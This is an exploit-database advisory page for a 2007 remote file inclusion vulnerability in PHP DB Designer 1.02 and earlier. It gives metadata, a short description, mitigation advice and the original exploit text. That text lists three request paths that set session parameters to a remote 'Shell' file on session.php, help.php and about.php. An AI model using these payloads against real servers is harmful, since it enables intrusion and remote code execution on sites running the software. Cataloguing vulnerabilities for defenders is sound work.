header-logo
Suggest Exploit
vendor:
PHP DB Designer
by:
GloD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: PHP DB Designer
Affected Version From: 1.02 and earlier
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP DB Designer <= 1.02 Remote File Include Exploit

This exploit allows an attacker to include a remote file in the PHP DB Designer version 1.02 and earlier. By manipulating the _SESSION[DRIVER] or _SESSION[SITE_PATH] parameters in the session.php, help.php, or about.php files, an attacker can include a malicious file from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of PHP DB Designer that does not contain this vulnerability. Alternatively, the affected files can be modified to properly validate and sanitize user input before including files.
Source

Exploit-DB raw data:

# PHP DB Designer <= 1.02 Remote File Include Exploit
# D.Script: http://sourceforge.net/projects/phpdbdesigner/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:[Path]/db/session.php?_SESSION[DRIVER]=Shell
# Exploit:[Path]/wind/help.php?_SESSION[SITE_PATH]=Shell
# Exploit:[Path]/wind/about.php?_SESSION[SITE_PATH]=Shell

# milw0rm.com [2007-03-16]

Navigation

Suggest Exploit

Services By CQR